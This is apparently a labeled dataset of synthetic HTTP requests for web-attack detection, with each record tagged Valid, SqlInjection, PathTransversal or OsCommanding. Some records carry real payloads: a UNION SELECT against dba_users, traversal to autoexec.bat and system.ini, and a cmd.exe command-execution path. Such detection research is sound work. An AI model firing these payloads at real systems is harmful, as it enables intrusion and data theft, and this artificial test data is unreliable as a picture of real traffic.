GET /h0xQdn/oi4oebwlaedasi/d3A/neksEtho/-9-bgsoundbinpjqMsystem6t/tVwr8HK9877utbPWWF.php3?elic=7111097046&meu=evonpedn&sta=meatttstoNeslplqe&oEgope7chwoalh=c18&RtKbult9eUr=etnemehrjtnrEn&eecbihetshme=ol+nsoiy&ltrwkP=t++hxtermeservicessechildtb2ooGs7nopen&mumhoV=rsapyo&nPbE=aXOAxySdV3Cz&M62ij=ervhu%40smi2&tluadnesnes=82239314&Dqeh=nLlEnH4M HTTP/1.1
Host: 232.183.140.205
Connection: close
Accept: video/quicktime;q=0.8, image/gif;q=0.3, text/*
Accept-Charset: x-mac-korean, euc-jp
Accept-Encoding: 
Accept-Language: pru-tckp6;q=0.8, isa-o;q=0.8
Cache-Control: only-if-cached
Client-ip: 41.159.222.224
Cookie: f2scNodttjnrdth=477570;ihnrmi=1;gGLW=A&tmptttc=so;o3nt3s=9526;ei1ehQeetps=A tojm mk@b;sndhriijtwoce=s1X
Cookie2: $Version="4"
Date: Tue, 23 Jun 09 05:02:17 GMT
ETag: W/"ftGWEArrI0_-kyK"
Expect: uwlSsit=ol2ea
From: esr8neue@emIt.biz
If-Modified-Since: Mon, 20 Aug 07 10:37:00 CET
If-Unmodified-Since: Thu, 07 Sep 06 01:29:48 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 15 Sep 09 21:10:10 CET
Max-Forwards: 376
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: nath o2h1E=5lEosz
Authorization: Basic T2UxczpIT2tlMw==
Range: 72-,4-191
Referer: /elydt5/6u36nl.cfm
TE: trailers,gzip
Trailer: If-Range
User-Agent: Mozilla/1.6 (Machintosh; U; PPC Mac OS X 8.3; a2-oW; rv:7.2.9) Gecko/81102363
UA-CPU: x86
UA-Disp: 595,813,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 969x1839
Via: 8.5 56.51.254.48
Transfer-Encoding: identity
Upgrade: ochnm/4.8, 7fb2al/4.6, nnde/0.6, Oii67o/1.6, btqoia/9.7
Warning: 013 32.109.56.115 "pnfua3r" "Tue, 13 Jun 06 23:41:16 CET"
X-Forwarded-For: 133.50.37.166
X-Serial-Number: 62118973546819667200
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21099
Start - Id: 35294
class: SqlInjection
GET /lsneeti/4rorg4AD/eEl4fshso9uAsBm6As/hSDzy5./hJHeF4wqDFGufM/t.OhyPIqhLfeV/fLlW8cDU.php3?aixtnsctn=i6euo5ib&0sRRrue=7&tzsmnebrNmtta=chairs%27+UNION++SELECT+s++FROM+++++dba_users+WHERE++name+++like++++%27%2525&psvhWexec1sB.=lieh6te83iftqtptO6&KdiemseeinosiO=3&iframeq7wherew5M0K=%25+Og&cOF2m5fHd=rtTicdqEe%3FodronE&6FRAqr-NbpKE=090&x36Qe7gUl=loov8heo&6wol=n62e&sisoo=27160&9Oia=aUdmu0NrG%40&tsclr=69858 HTTP/1.0
Host: www.e6rmOtnxem.gov
Connection: keep-alive
Accept: application/*;q=0.4, audio/*;q=0.3, video/*
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: no-cache
Client-ip: 213.3.132.26
Cookie: neortmC=tlli\=-NtQzeq&iAeunionk;B3t6nwsaaaeE3tu=hYwqxDK;ez0nq=kdsr
Cookie2: $Version="2"
Date: Thu, 27 Aug 09 16:08:02 UTC
ETag: "-DIqNN_AVJHh1rNgpl"
Expect: 100-continue
From: bohfsrn3@6agvleeeda.com
If-Modified-Since: Mon, 29 May 06 19:30:53 UTC
If-Unmodified-Since: Fri, 24 Nov 06 01:20:17 CET
If-Match: *
If-None-Match: "dek4Kt5dQ_EBPqgp78"
If-Range: Fri, 01 Jul 05 16:03:33 GMT
Max-Forwards: 6130
MIME-Version: 8.6
Pragma: 3vQonb='EheOeehs'
Proxy-Authorization: Digest opaque="wwob"
Authorization: Digest response="63e449EaDA96C351aed58DC48f8d64E0"
Range: 930-456,2355-
Referer: http://Sthwkx.gov/ecx4em.exe
TE: trailers,trailers
Trailer: Warning
User-Agent: Mozilla/1.0 (compatible; Konqueror/4.8; Open BSD i586; ctoEerb6e; uoenuait; itn67mr)
UA-CPU: StrongARM
UA-Disp: 420,4746,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 048x605
Via: 3.3 www.eir4am.htm, 7.1 www.jkne.png:3, 8.1 135.227.95.210
Transfer-Encoding: deflate
Upgrade: dn44o/1.3
Warning: 590 39.82.178.253 "aiHe" 
X-Forwarded-For: 111.116.93.90
X-Serial-Number: 019195237
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35294
Start - Id: 45609
class: PathTransversal
GET /qjIc/R__G1P0hK/eXr8Vo_p94DxiHiqKO/m1v27dlaj/e8adeh4hzaRb/detChigY5as/got9et9l0bCsD/rpY/tPaA/8qLb7LpYH5g/hzbt03.Tq.jpg?otnrw3cat=remoVLoih0uc&QR2-=asi%5D&yreowne=aiiRb8ws&laaI=T%3A%5Cautoexec.bat HTTP/1.0
Host: 33.82.49.169
Connection: close
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: esnEihur-TaelI, aTesg5-oAspi;q=0.1, it16y5-tt;q=0.9
Cache-Control: no-transform
Client-ip: 192.56.249.182
Cookie: Hnteosrr15tit=eUeGe-;E4JM3ZchildXOX=Brz1ei47m7;1DhPm9c.fl=oMW;en1=aornda0sni;eshtTv=lh1
Cookie2: $Version="71"
Date: Thu, 13 Jan 05 03:20:39 GMT
ETag: W/"hYq.Qe6vS5JVPkNg"
Expect: esyo=tri8;dewo=I4XpUye
From: f4re3ea2@HiNl.uk
If-Modified-Since: Wed, 21 Jan 04 24:56:21 GMT
If-Unmodified-Since: Wed, 01 Mar 06 19:29:14 CET
If-Match: *
If-None-Match: "2mV2QwsXwi2Wo9KAEEK"
If-Range: *
Max-Forwards: 07
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: ench vu6n=5eeTe
Authorization: NTLM ZG5mQmVwaGFqdHN3M2g3d1JwdGQzMGkzaG1FSWNubU5vdWlzZXRpY2VhdHVz
Range: 942-,71595-5
Referer: http://tsaernqw.de/eohuridL/wlgRr/esiNHwG.exe
TE: deflate;q=0.5,trailers,chunked
Trailer: Via
User-Agent: b_4Twe http://www.dwoaij.gov
UA-CPU: x86
UA-Disp: 6050,986,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 0039x975
Via: eat5l/9.9 76.214.212.118
Transfer-Encoding: uRazet; srieue=hqohnosi
Upgrade: xcrorS/0.7
Warning: 463 21.80.148.220 "rrehjvicmc0ctipxgiaz" "Tue, 25 May 04 08:29:25 CET"
X-Forwarded-For: 48.145.225.109
X-Serial-Number: 749320741
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45609
Start - Id: 15426
class: Valid
GET /n-Q8v-v/dna/N2@c6av/i4erj.php3?loyo=093143&BTn.AYkTvAv=069424&snlHz8ak=7rteup&dm=9&RKMuEWWT=t6pqyc HTTP/1.0
Host: www.lATlipyi4.fr
Connection: close
Accept: */*
Accept-Charset: windows-1254
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: only-if-cached
Client-ip: 104.12.11.229
Cookie: y9n1it86soue=e9_;sfemoebefqnjt=5805640178;flz=paP&mRTri;3rofr=se9wjrusa0a7tdlt;GiEoTuvyO4=%ue9nh@deT
Cookie2: $Version="494"
Date: Wed, 19 Aug 09 06:45:20 GMT
ETag: "2l.48YiwXcr_reAeJH5@"
Expect: 100-continue
From: hreEo@mhtthLrava.org
If-Modified-Since: Wed, 25 Nov 09 16:10:58 UTC
If-Unmodified-Since: Thu, 22 Mar 07 10:41:43 GMT
If-Match: "zX8W3XlBK1BZlED@wuJ7"
If-None-Match: *
If-Range: "Hp34MJCy@SdKFCTx"
Max-Forwards: 978
MIME-Version: 1.7
Pragma: no-cache
Proxy-Authorization: Digest response="70C8dc020EB2a7c525866dCFfF9dFf75"
Authorization: NTLM YWl5dHJFb2J0OWVUc2lhYXJldG9xOU9lZ1RlaGU2b1NvdG5lcWF0ZQ==
Range: -590219
Referer: /rouVGt/pnlt/eigoNw5c/bhe7lse.dll
TE: trailers,trailers
Trailer: If-Match
User-Agent: nirtswmoJni1u0toav
UA-CPU: x86
UA-Disp: 842,1582,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 6536x0749
Via: khpn/5.2 30.99.191.20, 0.9 www.sy0brL.gif
Transfer-Encoding: deflate
Upgrade: ncaer/8.0, rbkq/6.1, eos/1.0, ckiws/1.2, 6ln76s/2.0
Warning: 680 177.253.57.76 "nFrmsteeL" 
X-Forwarded-For: 198.220.179.151
X-Serial-Number: 24141
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15426
Start - Id: 11019
class: Valid
GET /cwgJOVWs7rX1_P/pTnode4fqoje/tmglas0lr67orTNaod/e3sjZV3_aSFBAVhwM2.bin? HTTP/1.0
Host: 13.134.128.224
Connection: close
Accept: video/mpeg;q=0.6, application/*;q=0.0, audio/basic
Accept-Charset: iso-8859-6;q=0.3, iso-8859-7;q=0.2
Accept-Encoding: compress, identity, compress, compress;q=0.1, gzip
Accept-Language: *
Cache-Control: min-fresh=0
Client-ip: 6.3.140.113
Cookie: H3dAftptpr=8;ennni=189218874
Cookie2: $Version="304"
Date: Wed, 24 Dec 08 08:21:57 UTC
ETag: "9zaHIlbRk0sS1PMR"
Expect: 100-continue
From: 4eas@rtdnopat.ch
If-Modified-Since: Sun, 24 Jan 10 23:04:16 GMT
If-Unmodified-Since: Wed, 18 Mar 09 02:38:16 GMT
If-Match: "z.iEbjSN8Xu9x-CtHo4Q"
If-None-Match: *
If-Range: Thu, 16 Jun 05 08:00:15 GMT
Max-Forwards: 63
MIME-Version: 8.9
Pragma: e=uad
Proxy-Authorization: Basic ZnBzdW9yZ286cmxlNA==
Authorization: frlo aanmyNd=hr5h
Range: 088577-,4710-50
Referer: /1rsicgen/iLrO/bqiwu.msf
TE: gzip,trailers,gzip
Trailer: Date
User-Agent: Mozilla/2.4 (compatible; MSIE 7.8; SunOS sun4u; eiequ8)
UA-CPU: x86
UA-Disp: 618,722,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 956x6194
Via: HTTP/2.4 www.hita.tiff:249
Transfer-Encoding: identity
Upgrade: fbea/3.4, dod1i/0.7
Warning: 534 www.eert2m.png "rsiome4rndpLE" "Sat, 25 Nov 06 03:55:36 GMT"
X-Forwarded-For: 187.124.141.113
X-Serial-Number: 109708230731
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11019
Start - Id: 3238
class: Valid
GET /fnnaRkwn/vw8attornecneYedtite/ljRlieostyos/tQjd0jwa90_Ne.cgi? HTTP/1.1
Host: www.rvgXtf.be:80
Connection: close
Accept: */*;q=0.9
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.5
Accept-Language: rw-s, nGrt-ifeiErR;q=0.9, cobre-ee, oblc-guoset;q=0.8
Cache-Control: max-stale=979
Client-ip: 188.219.205.224
Cookie: oi0er=shE~enwogkd[p;Acaemant=ohxH+mb;sqciokesrfil=e6ipee3esyA;t1pvel=ee?|5t/e-a$ NJimi
Cookie2: $Version="940"
Date: Wed, 01 Mar 06 05:35:40 GMT
ETag: "ApY8eeuPU@ZPUbkv"
Expect: 100-continue
From: enn6@rliEa.it
If-Modified-Since: Fri, 17 Mar 06 10:06:52 GMT
If-Unmodified-Since: Fri, 12 Jan 07 24:50:57 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 01 Oct 07 22:21:59 UTC
Max-Forwards: 04
MIME-Version: 4.4
Pragma: no-cache
Proxy-Authorization: Basic dGVpaHM6b2lsYWRkYWk=
Authorization: Basic aW93cm0ycTpsc3dv
Range: -9119
Referer: http://www.wane7bd.ch/4ooc.aspx
TE: trailers
Trailer: Host
User-Agent: Mozilla/8.3 (compatible; MSIE 4.5; Windows NT; bvmptaru; eowutaaism)
UA-CPU: x86
UA-Disp: 098,469,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 796x812
Via: FTP/7.0 138.253.131.197, 2.5 www.xabg.js:07, FTP/2.9 161.246.123.207:327
Transfer-Encoding: compress
Upgrade: Anim/9.2, 4ebtk/6.4
Warning: 925 www.t1tEewa.css "iYe7tpBtm7wyjraztas" 
X-Forwarded-For: 252.218.6.87
X-Serial-Number: 65430
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3238
Start - Id: 31366
class: Valid
GET /dt/hetssldnr1ism/hhwsWDinn9/r4zuunV/sV4b/lbltrechoetDeccl/iD2l-9UgxxTlICt/2autorggiti/iDjteimic6pei.css?yr=sxeh&tStghKAvi6xeort=t&nwyTxpnetcat=f%7C HTTP/1.0
Host: 149.78.186.207:0
Connection: keep-alive
Accept: application/*
Accept-Charset: iso-8859-7
Accept-Encoding: compress;q=0.3, gzip, identity;q=0.7
Accept-Language: lm-e4Egq, odea-hZszetrs
Cache-Control: no-transform
Client-ip: 123.99.49.204
Cookie: ttewestpo2t=5ahrn;iei=h;sshyraawjqxtxwj=a;iiuHl6huud=98
Cookie2: $Version="1"
Date: Sun, 21 Sep 08 01:05:14 GMT
ETag: W/"gyWO3rh00I1Q6ox4"
Expect: 100-continue
From: ertro@3cIlsoRsD5.cz
If-Modified-Since: Fri, 12 Jun 09 11:54:47 CET
If-Unmodified-Since: Sun, 25 Jan 04 20:32:32 GMT
If-Match: "FGlpgEhW130b6MAjZN8"
If-None-Match: "tnpl_WKX8c0xaRorWU8"
If-Range: Sat, 18 Jul 09 12:31:12 UTC
Max-Forwards: 69
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: NTLM dGVyZHluZW5zcHNkbmFwYWVST2VlamlucGlMaXV0Ym50YU9vY2k=
Authorization: aaebq iit8t=dRtuh
Range: -34878,6878-7,3101-
Referer: http://vcht.fr/Odaa1d.html
TE: trailers,deflate,deflate;q=0.7
Trailer: Referer
User-Agent: whOcoeC/2.9.9.7.8
UA-CPU: x86
UA-Disp: 2596,238,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 7934x883
Via: 6.2 www.zomd.css
Transfer-Encoding: D3eprL; SWturi=ayur
Upgrade: aaeza/3.0
Warning: 013 www.desun.jpg "AikotD" "Sun, 12 Nov 06 05:18:44 UTC"
X-Forwarded-For: 122.12.60.197
X-Serial-Number: 12566826495921
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31366
Start - Id: 16502
class: Valid
GET /suhevo22eoZwiAmomerr.gif?AexecQOQbodyRmXsL=49261310&group by6yS6C=teHsey6ntDwanernea&o9f=hr%28rg&7sthd=c&Own=%5D43&redel8o5hfncqph=tJpMA&ams=apositionOga&dree1s=tontBglc&boot.iniyx34b3perl=30&jdNc=iu&5otybRbth6Deww=qehtntoholmRes8&oajnehrf=dEDyHW&MM4-3msM49=11684&xl3emoT=8183866 HTTP/1.0
Host: www.dosee.com
Connection: close
Accept: video/quicktime;q=0.3
Accept-Charset: gb2312;q=0.1, x-mac-chinesesimp;q=0.3, iso-8859-9;q=0.2, x-mac-turkish, koi8-r;q=0.5
Accept-Encoding: deflate;q=0.7, identity;q=0.6, deflate
Accept-Language: vtes-4, amtBT37-psn
Cache-Control: req='hnsma6i9'
Client-ip: 142.250.211.39
Cookie: aiPctandd0oesc=65979886;dvCtesdtig57tRn=ocW
Cookie2: $Version="56"
Date: Fri, 18 Jun 04 12:42:29 UTC
ETag: W/"VpVWT_ucDDlJoME-.Hs"
Expect: 100-continue
From: a3hb@rjzaoeAala.com
If-Modified-Since: Sat, 13 May 06 17:42:58 CET
If-Unmodified-Since: Mon, 15 Feb 10 14:51:38 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 03 Apr 04 10:04:55 GMT
Max-Forwards: 1744
MIME-Version: 0.2
Pragma: utkig='dbeen'
Proxy-Authorization: NTLM cmxwZ2E1eGdUTmdzNmVydGdib2VyczVyc3RhdG9pc2k=
Authorization: Basic d2xwVXJkeWk6dXdlZWVueG4=
Range: 90-3929,2123-,048886-
Referer: /enoszda/yyot/nekidm/et2e/0ett9bE0.jpg
TE: deflate,trailers
Trailer: Via
User-Agent: n5lrafv3uobceVSrfe
UA-CPU: StrongARM
UA-Disp: 456,224,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 2853x703
Via: 0Eg/4.0 www.waut.gif, 0.9 www.qAseo.tiff, HTTP/3.1 24.226.8.174
Transfer-Encoding: identity
Upgrade: nhf/8.7, zonot/2.3, yoye/6.2
Warning: 399 165.168.5.56 "Yeip137iXelsbw" 
X-Forwarded-For: 59.247.137.64
X-Serial-Number: 924261
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16502
Start - Id: 171
class: Valid
GET /htdQyevzcylei/fhotioh/h_TrD@jseqk9DiNd./wiiHoET9seenr/nea5gasbeeiInyOq/mpaxpprbaIba/iliy9rudaipE/twH.jpg?mgadnetozwk=53&ent=%28r%257c&tae=644189&nph-VrSOhaving=46861361&hSMEKH81=fy7xQu&ytaye=0&8rnT=mg+s&ep=o3ao&diytSoaec=mraykns6OrJxslale3&weesn0xm6=363556&access_logqv9LFD=a89tiTTtotwF3ye&1n=b1+ze+h45Madac&uti=-hte%254s+lmailMhgttwu&hZrI2passwdp8G9=nsmwnt%2FHs%3Astdin HTTP/1.1
Host: 225.136.38.215
Connection: xecit
Accept: audio/basic;q=0.0, image/gif, audio/*;q=0.2
Accept-Charset: iso-8859-7, koi8-r;q=0.1, iso-8859-15
Accept-Encoding: *
Accept-Language: tt-im8, lv-l;q=0.3, m-wikytndr, Nteel-nOd;q=0.4
Cache-Control: only-if-cached
Client-ip: 49.228.57.192
Cookie: th=5uacopy5hlTaioj
Cookie2: $Version="125"
Date: Mon, 02 Oct 06 19:32:13 GMT
ETag: "f61ret1R3hv18txQ0Z"
Expect: onwo8=ittano
From: ilna2r@Raixrttrhe.st
If-Modified-Since: Sat, 22 Jan 05 11:45:52 CET
If-Unmodified-Since: Thu, 02 Jul 09 10:35:22 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 04 Feb 06 22:49:28 GMT
Max-Forwards: 2722
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: veEqi eioatnQ=eafazya
Range: -63
Referer: /rtzhzio/urknh/srneameu/wwoha.jpeg
TE: deflate;q=0.0,gzip
Trailer: Transfer-Encoding
User-Agent: Mozilla/3.6 (compatible; Konqueror/7.3; Unix; jlwtpc)
UA-CPU: MIPS
UA-Disp: 1257,262,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 7281x9184
Via: 8.2 242.210.5.149, sNuS2/5.0 www.aAddt4n.js
Transfer-Encoding: gzip
Upgrade: 3ilhh/7.5, sclai/5.5, chnnyw/6.6, nlh/5.8, Fmk/0.2
Warning: 367 www.lqnT2.htm "rqtcera" 
X-Forwarded-For: 7.28.176.57
X-Serial-Number: 3449007851195603
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 171
Start - Id: 44065
class: OsCommanding
GET /images/.%2e/.%2e/.%2e/.%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 86.66.39.2
Connection: keep-alive
Accept: application/x-tar;q=0.9, text/*
Accept-Charset: windows-874;q=0.5, shift_jis;q=0.9, iso-8859-4;q=0.4, isiri-3342
Accept-Encoding: compress;q=0.3, compress;q=0.3, deflate
Accept-Language: icw9pe7-i, hi7TjEe4-a;q=0.2
Cache-Control: r='ien8yyle'
Client-ip: 185.93.146.213
Cookie: yroebaofl57s=r;access_log8Ktmpz8ELdA=]s A'6;e7iessel=8yye.yvjR36T;bU.mpga5=445662;8z=9e4e;h0zem8t4=td01
Cookie2: $Version="43"
Date: Thu, 31 Mar 05 22:54:20 UTC
ETag: W/"8jJSMp1FL9CwR-.L4"
Expect: 100-continue
From: Llna9@hrnonxai.de
If-Modified-Since: Wed, 11 Oct 06 11:18:01 UTC
If-Unmodified-Since: Thu, 06 Jul 06 17:27:44 UTC
If-Match: "IwDXv31yqsmJflwHHA-G"
If-None-Match: "PpmnxhuvcL8N-J4"
If-Range: "eu_rg-oNA6PaOLaz"
Max-Forwards: 5863
MIME-Version: 2.6
Pragma: lace=na
Proxy-Authorization: NTLM dDF0aE5xMXl5dGV0bng5c2wycmFvdGlhYWF3cjZSbWtubXV0bQ==
Authorization: Digest nonce
Range: 42-,-56317,-7
Referer: http://www.eirlprD.it/s97rihee/eOMht0/ectTHe7G.mdb
TE: trailers,trailers,trailers
Trailer: Max-Forwards
User-Agent: ndM-lE http://www.ibNr.com
UA-CPU: PowerPC
UA-Disp: 6409,6413,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 4959x090
Via: 8.6 www.cbtGUa.shtml
Transfer-Encoding: deflate
Upgrade: Rjwza/4.8, tein/1.3, crss4/4.1
Warning: 539 167.196.18.192 "faE4bxsefpe4nbstnL" 
X-Forwarded-For: 180.219.181.140
X-Serial-Number: 412280187
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44065
Start - Id: 24761
class: Valid
GET /l5etep4uidiwehs8ec/l0hrta7/eMPIEi@fdRi4bdTqSt/A9Iioeaea4q.js?sotcre1neh5eONM=te&wophypd5by=s+vee%25y&26Xl9xn=1ehkctvdjcciiut5&fmiEnenaed=61750184&g5nEgltrhe2hc1=a&isypgoahdcmeob=imohn+e&ysia=o HTTP/1.1
Host: 234.71.155.1
Connection: keep-alive
Accept: audio/*, text/html
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: max-age=648
Client-ip: 61.61.29.196
Cookie: r@2hp1V7aVT=s jl3Mbh;staSHy35rmesuee=t
Cookie2: $Version="2"
Date: Mon, 26 May 08 11:46:50 UTC
ETag: "mbNVy92LX8nn0vX"
Expect: 100-continue
From: 4Pioe@levcc.org
If-Modified-Since: Tue, 26 Apr 05 12:30:15 GMT
If-Unmodified-Since: Thu, 20 Jul 06 20:31:44 UTC
If-Match: "K@_rjDUy1eOPG@s7kcH"
If-None-Match: "9bnjRoIkyX8uD6zh@@9b"
If-Range: Fri, 18 Jul 08 05:07:32 UTC
Max-Forwards: 6179
MIME-Version: 4.8
Pragma: t19Tsehe='iltiou'
Proxy-Authorization: Digest cnonce="mee9"
Authorization: NTLM Zmlkc0xtc2dTc25zbGpiYUhwcm13aWlDOHA0bm1hcmc=
Range: -36328,9-116,9338-3
Referer: http://dgnnhne.biz/nhamlNir/foni/aleebh/meSpy/eo7howlh.exe
TE: chunked;q=0.2,chunked;q=0.6
Trailer: Cache-Control
User-Agent: nPrki2c http://www.6xath.cz
UA-CPU: 68000
UA-Disp: 5167,9825,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 1017x8120
Via: FTP/0.9 www.eaea.shtml
Transfer-Encoding: deflate
Upgrade: nIi/7.5
Warning: 359 103.214.55.150 "gerqrshewktm9do" "Thu, 21 Sep 06 01:37:25 GMT"
X-Forwarded-For: 109.34.199.216
X-Serial-Number: 05073071780221168240
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 24761
Start - Id: 4204
class: Valid
PUT /tleeNhxry/9JojtBm2N2B@48/wQCSiY-Jbs8/lKE/0nn8crdspet/4nanjurcxpynuzeuu/ThomeaBK.php? HTTP/1.0
Content-Length: 107
Content-Language: gc
Content-Encoding: deflate
Content-Location: http://www.zalae.fr/3xdto/ox6gel.asp
Content-MD5: dGVoZXZzY3NienlvM3JhdA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 10 Apr 09 24:15:52 GMT
Last-Modified: Thu, 14 Jun 07 19:19:07 CET
Host: 81.14.69.241:426
Connection: Osjc
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: elxgni-z5hinh;q=0.5, penM-9s, lhabwol-Iutup;q=0.2, sdnrbii-g
Cache-Control: no-cache
Client-ip: 139.195.254.48
Cookie: nigrdiereiwa=s\c
Cookie2: $Version="26"
Date: Mon, 09 Jul 07 08:49:28 CET
ETag: W/"lL.dSWFCnb0m-O_iW7P"
Expect: vT4menq
From: tewe@gFoteninnd.com
If-Modified-Since: Sat, 29 Nov 08 15:30:11 CET
If-Unmodified-Since: Thu, 17 Mar 05 13:07:17 CET
If-Match: *
If-None-Match: "tXL4Ew-BJN4rKbdKKNz"
If-Range: Wed, 26 May 04 13:28:03 GMT
Max-Forwards: 9906
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: Digest cnonce="ys6ahg"
Authorization: Digest algorithm=1sasp4o
Range: 2-,878-,561480-5
Referer: /easevg/7ntxhI/nhs6dvi/wiofits.jpeg
TE: trailers,trailers
Trailer: Warning
User-Agent: Mozilla/7.6 (compatible; Konqueror/6.1; Windows NT; lorutdak; eAstNi)
UA-CPU: x86
UA-Disp: 505,4605,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 820x313
Via: 0.7 242.41.23.214
Transfer-Encoding: pRme; pnoO2=ewAet
Upgrade: hoPa/4.4, Rhih/0.5
Warning: 509 32.174.131.157 "blmx" "Mon, 22 Dec 08 02:53:51 GMT"
X-Forwarded-For: 145.194.83.222
X-Serial-Number: 70476
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

s5tyESyweert=riO5&npe=qtS)9ogl7Rsbgsoundi&wnrojobNb0tm=orteyCmcn&emdhci9=s&esvyaloeotl=bOHQ6IaCLuI&ry22=t

End - Id: 4204
Start - Id: 45373
class: PathTransversal
POST /fnseoyrajhsrtnmbnij/a35p9yAUFRY64oscU/hl/hniocent/crsfbtkttsrlatgbc/cjtmTlN92oaneiEhtcsw/nisiemNJjhi/E0arTlascsimtoo0t.png? HTTP/1.0
Content-Length: 252
Content-Language: su9sz
Content-Encoding: deflate
Content-Location: /iwtioyr.dll
Content-MD5: QXNzMDFFcWF4bTRvZXNuOA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 30 May 04 04:57:24 GMT
Last-Modified: Sun, 27 Nov 05 22:51:08 GMT
Host: 40.90.113.57:78
Connection: xchaw
Accept: */*
Accept-Charset: iso-8859-8-i;q=0.0, x-mac-icelandic;q=0.0, windows-1258;q=0.6, iso-8859-2;q=0.6
Accept-Encoding: *;q=0.8
Accept-Language: g-hyjmnhx9;q=0.0
Cache-Control: max-stale
Client-ip: 219.120.83.225
Cookie: cehjohyhOooh=7;Bha=eb9Q;diEn=928;rKGjoh=oepositionc;kork8Negoh0l=$ztl
Cookie2: $Version="96"
Date: Fri, 27 Aug 04 11:54:29 GMT
ETag: W/"B9SBjm1lLCiZpvnPjtU"
Expect: 100-continue
From: fUgaR@h0hl85ut.uk
If-Modified-Since: Sun, 26 Apr 09 02:03:38 GMT
If-Unmodified-Since: Wed, 27 Jun 07 18:46:59 UTC
If-Match: "8bl_RjSClDPqSdpag"
If-None-Match: *
If-Range: Thu, 19 Mar 09 16:00:20 UTC
Max-Forwards: 0452
MIME-Version: 4.4
Pragma: eel='sy'
Proxy-Authorization: Basic bDZlc29uZDppS3Qzcw==
Authorization: Digest opaque="exnaahng"
Range: 74377-10,-135
Referer: http://www.oadeawef.gov/pS1uwia/1fmeaisK/onstpor/4nticde1/ell0i.pl
TE: trailers,trailers,trailers
Trailer: Transfer-Encoding
User-Agent: dcdmeso (v1drcQ)
UA-CPU: Sparc
UA-Disp: 9353,7001,16
UA-Color: color8
UA-Pixels: 0455x0884
Via: 1.0 40.146.129.164, FTP/3.4 3.243.189.169, ooe/1.3 33.111.197.167:3324
Transfer-Encoding: compress
Upgrade: y6otbe/1.0, A4me31/2.9, Aloea/2.4
Warning: 033 102.101.187.47 "senpv3nMsOiNryeagcPt" 
X-Forwarded-For: 42.158.87.228
X-Serial-Number: 37550564020499
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Ltctt6oEed04ves=liee Efber&xrrosbnsaoaDq=m&dttE9rnroRo=1%&nde=hDt6&0Hiln2tlc6rhR0e=s1QS.zx&hcsayou=\WINDOWS\system.ini&80t08d8=1&4hltlcsts=abXjo9.lo6q&iw=cwp-$s|eCaautoexec t]d&mgbscse=4&AnLNpRkM8ovy=tqu0eBReltnuxwoe&hx=sCha8lne.IA&rl0hce= 

End - Id: 45373
Start - Id: 23550
class: Valid
GET /tb4lguhi7wgoAjw/pb0/eYX9ONc3x0b/gDLRjuyMiP8QH@utIr9I/esn6/o8wz55sUYe/en3cooertiviiCto.cgi?dxtpo=%3C%3A%3Dakbahoreqej&acceptSgshutdowns9=tsDlRAQYt_L&Isu3omd=rT%2Fa97r6iu&bmSiegeqei=htaccesra%28petOpscriptAk+6a-metaT&nvwGas=7t&e5=0&42tatnrVo=9308464&hr4nj8mses=8080&i2cb5i3l=345&C_GgOrgD4zs=4&_FeKV4mochasG=56&oqRs8=ln&a7AeBfsr=39989 HTTP/1.1
Host: www.eshber.gov
Connection: ewiaCv
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.0
Cache-Control: no-cache
Client-ip: 186.208.141.68
